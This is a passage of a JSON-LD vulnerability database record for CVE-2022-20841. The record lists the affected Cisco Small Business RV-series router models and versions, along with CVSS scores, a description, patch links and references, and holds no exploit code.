          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202208-0323",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv345",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv260w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv340w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv160w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv160",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn \u30eb\u30fc\u30bf with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "cve": "CVE-2022-20841",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2022-20841",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20841",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20841",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20841",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20841",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202208-2169",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. RV160 VPN router firmware, RV160W Wireless-AC VPN router firmware, RV260 VPN Multiple Cisco Systems products, including router firmware, contain vulnerabilities related to input validation.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. \nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. \nThis advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20841",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.3837",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20841",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "id": "VAR-202208-0323",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-08-14T14:10:40.986000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-sb-mult-vuln-CbVp4SUR",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "Cisco Small Business RV Series Routers Enter the fix for the verification error vulnerability",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=204364"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-20",
            "trust": 1.0
          },
          {
            "problemtype": "Inappropriate input confirmation (CWE-20) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20841"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.3837"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-20841/"
          },
          {
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-20841"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-10-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "date": "2022-08-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "date": "2022-08-10T08:15:07.317000",
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-10-11T05:30:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          },
          {
            "date": "2022-08-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          },
          {
            "date": "2023-11-07T03:43:06.027000",
            "db": "NVD",
            "id": "CVE-2022-20841"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Input validation vulnerability in multiple Cisco Systems products",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-017111"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "input validation error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2169"
          }
        ],
        "trust": 0.6
      }
    }